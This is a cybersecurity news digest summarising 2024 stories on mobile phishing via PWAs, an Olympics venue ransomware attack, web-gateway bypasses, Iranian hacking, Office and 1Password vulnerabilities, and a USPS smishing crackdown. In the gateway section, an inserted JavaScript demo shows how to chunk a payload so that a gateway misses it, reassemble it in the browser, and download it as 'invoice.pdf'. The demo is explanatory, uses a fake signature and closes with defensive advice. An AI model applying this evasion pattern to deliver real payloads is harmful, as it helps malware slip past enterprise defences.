Be careful what you pwish for – Phishing in PWA applications

From welivesecurity.com

ESET analysts dissect a novel phishing method tailored to Android and iOS users.

[They] discovered a series of phishing campaigns targeting mobile users that used three different URL delivery mechanisms. These mechanisms include automated voice calls, SMS messages, and social media malvertising.

The voice call delivery is done via an automated call that warns the user about an out-of-date banking app and asks the user to select an option on the phone's numeric keypad. After pressing the correct button, a phishing URL is sent via SMS. This was reported in a tweet by Michal Bláha.

Initial delivery by SMS was performed by sending messages indiscriminately to Czech phone numbers. The message sent included a phishing link and text to socially engineer victims into visiting the link.

Read more…

Paris Olympics deals with ransomware attack

From scmagazine.com

A ransomware attack against the Paris Grand Palais exhibition hall, where Olympic events are being held, is being investigated.

According to MSN, a police investigation determined that the attackers targeted the institution’s central computer system, but the incident had not caused any disruption to Olympic events.

The computer system at the venue also handles data for 40 — mainly small — museums with which it is affiliated, the prosecutors said in an email.

Josh Jacobson, director of professional services at HackerOne called the attack unsurprising — but potentially quite creative. He said the outcome of this successful compromise could be beneficial to cybercriminals in a number of ways:

1) Because of the sheer number of venues that will be scrambling to get their operations up and running, the bad actors could be hoping to rake in ransoms across the victim pool and maximise financial gain.

Read more…

Secure Web Gateways are anything but as infosec hounds spot dozens of bypasses

From theregister.com

Defcon – Secure Web Gateways (SWGs) are an essential part of enterprise security, which makes it shocking to learn that every single SWG in the Gartner Magic Quadrant for SASE and SSE can reportedly be bypassed, allowing attackers to deliver malware without Gateways ever catching on.

Using a tactic he’s dubbed “last mile reassembly,” SquareX founder and long-time security researcher Vivek Ramachandran said he’s managed to suss out more than 25 different methods to bypass SWGs, all of which boil down to the same basic exploit: They miss a lot of what’s going on in modern web browsers.  

“[SWGs] were invented almost 15, 17 years back [and] it all started as SSL intercepting proxies,” Ramachandran told us. “As cloud security became more important people built out this entire security stack in the cloud.

“This is really where the problem begins.” 

SWGs, Ramachandran explains, mostly rely on their ability to infer application-layer attacks from network traffic before it reaches a web browser. If the traffic is not recognizable as malicious at that point, the SWG may not detect it and instead delivers it to the user's browser.
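The excerpt names the technique but does not show what it looks like, so here is an added illustration (not SquareX's code and not one of their published bypasses): a payload is cut into pieces that a gateway inspecting each HTTP response on its own never sees whole, while the page's own JavaScript reassembles it in the browser. The signature string, payload, chunk size and the download filename are constructed for the demo; in a real page the last step hands the assembled bytes to a Blob and triggers a download.

```javascript
// Added illustration of "last mile reassembly" (constructed example, not
// SquareX's code): a gateway that inspects each HTTP response in isolation
// never sees the whole payload, but the page's JavaScript does.

// Stand-in for an AV/SWG signature. Constructed for this demo; it is not a
// real malware marker.
const SIGNATURE = "X-TEST-MARKER-NOT-REAL-MALWARE";

// Constructed "file" the attacker wants to land in the browser.
const PAYLOAD = "header...\n" + SIGNATURE + "\n...rest of file";

// Server side: cut the payload into fixed-size pieces and base64-encode each,
// as if served from /chunk/0, /chunk/1, ... A chunk size smaller than the
// signature guarantees no single response contains the whole signature.
function splitIntoChunks(payload, chunkSize) {
  const chunks = [];
  for (let i = 0; i < payload.length; i += chunkSize) {
    chunks.push(btoa(payload.slice(i, i + chunkSize)));
  }
  return chunks;
}

// Gateway: decodes base64 (as a real SWG would) and scans one response at a
// time. It has no notion that the responses belong together.
function gatewayFlagsResponse(responseBody) {
  let decoded = responseBody;
  try {
    decoded = atob(responseBody);
  } catch (_) {
    // not base64: scan the raw body instead
  }
  return decoded.includes(SIGNATURE);
}

// Browser: the page's script fetches every chunk and stitches them back
// together. This is the "last mile" the gateway never observes.
function browserReassemble(chunks) {
  return chunks.map((c) => atob(c)).join("");
}

// Where a defender can still look: the assembled buffer (e.g. from a browser
// extension or a download hook) before it becomes a file on disk.
function clientSideScan(assembled) {
  return assembled.includes(SIGNATURE);
}

// In a real page the assembled bytes are wrapped in a Blob and handed to the
// download machinery; guarded so the demo also runs outside a browser.
// The filename is hypothetical.
function triggerDownload(assembled, filename) {
  if (typeof document === "undefined") return false;
  const url = URL.createObjectURL(new Blob([assembled]));
  const a = document.createElement("a");
  a.href = url;
  a.download = filename;
  a.click();
  URL.revokeObjectURL(url);
  return true;
}

function demo(chunkSize) {
  const chunks = splitIntoChunks(PAYLOAD, chunkSize);
  const gatewayBlocked = chunks.some(gatewayFlagsResponse);
  const assembled = browserReassemble(chunks);
  return {
    chunkCount: chunks.length,
    gatewayBlocked, // false whenever every chunk is shorter than the signature
    assembledIntact: assembled === PAYLOAD,
    clientSideDetected: clientSideScan(assembled),
    downloaded: gatewayBlocked ? false : triggerDownload(assembled, "invoice.pdf"),
  };
}

console.log(demo(16));   // chunked: gateway misses it, browser holds the full payload
console.log(demo(1024)); // single response: gateway sees the signature
```

The only difference between the two runs is the chunk boundary: the same gateway logic catches the payload when it arrives in one response and misses it when no response contains the full signature. Chunking is just one way of keeping the gateway's per-response view incomplete; the practical takeaway is that whatever check matters has to run on what the browser actually assembles, not only on what crossed the wire.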

Read more…

Microsoft researchers report Iran hackers targeting US officials before election

From reuters.com

WASHINGTON, Aug 9 (Reuters) – Microsoft researchers said on Friday that Iran government-tied hackers tried breaking into the account of a “high ranking official” on the U.S. presidential campaign in June, weeks after breaching the account of a county-level U.S. official.

The breaches were part of Iranian groups’ increasing attempts to influence the U.S. presidential election in November, the researchers said in a report that did not provide any further detail on the “official” in question.

The report follows recent statements by senior U.S. Intelligence officials that they’d seen Iran ramp up use of clandestine social media accounts with the aim to use them to try to sow political discord in the United States.

Iran’s mission to the United Nations in New York told Reuters in a statement that its cyber capabilities were “defensive and proportionate to the threats it faces” and that it had no plans to launch cyber attacks. “The U.S. presidential election is an internal matter in which Iran does not interfere,” the mission added in response to the allegations in the Microsoft report.

Read more…

Microsoft discloses Office zero-day, still working on a patch

From bleepingcomputer.com

Microsoft has disclosed a high-severity zero-day vulnerability affecting Office 2016 and later, which is still waiting for a patch.

Tracked as CVE-2024-38200, this security flaw is caused by an information disclosure weakness that enables unauthorized actors to access protected information such as system status or configuration data, personal info, or connection metadata.

The zero-day impacts multiple 32-bit and 64-bit Office versions, including Office 2016, Office 2019, Office LTSC 2021, and Microsoft 365 Apps for Enterprise.

Even though Microsoft’s exploitability assessment says that exploitation of CVE-2024-38200 is less likely, MITRE has tagged the likelihood of exploitation for this type of weakness as highly probable.

“In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file that is designed to exploit the vulnerability,” Microsoft’s advisory explains.

“However, an attacker would have no way to force the user to visit the website. Instead, an attacker would have to convince the user to click a link, typically by way of an enticement in an email or Instant Messenger message, and then convince the user to open the specially crafted file.”

The company is developing security updates to address this zero-day bug but has yet to announce a release date.

Read more…

Critical 1Password flaws may allow hackers to snatch your passwords (CVE-2024-42219, CVE-2024-42218)

From helpnetsecurity.com

Two vulnerabilities (CVE-2024-42219, CVE-2024-42218) affecting the macOS version of the popular 1Password password manager could allow malware to steal secrets stored in the software’s vaults and obtain the account unlock key, AgileBits has confirmed.

Discovered by the Robinhood Red Team during a security assessment of 1Password for Mac and then privately reported to the software’s makers, the vulnerabilities have been fixed in two consecutive versions of the software: v8.10.36 (released on July 9) and v8.10.38 (released on August 6).

AgileBits says that they have received no reports that these issues were discovered or exploited by anyone else.

Read more…

USPS Text Scammers Duped His Wife, So He Hacked Their Operation

From wired.com

The flood of text messages started arriving early this year. They carried a similar thrust: The United States Postal Service is trying to deliver a parcel but needs more details, including your credit card number. All the messages pointed to websites where the information could be entered.

Like thousands of others, security researcher Grant Smith got a USPS package message. Many of his friends had received similar texts. A couple of days earlier, he says, his wife called him and said she’d inadvertently entered her credit card details. With little going on after the holidays, Smith began a mission: Hunt down the scammers.

Over the course of a few weeks, Smith tracked down the Chinese-language group behind the mass-smishing campaign, hacked into their systems, collected evidence of their activities, and started a months-long process of gathering victim data and handing it to USPS investigators and a US bank, allowing people’s cards to be protected from fraudulent activity.

Read more…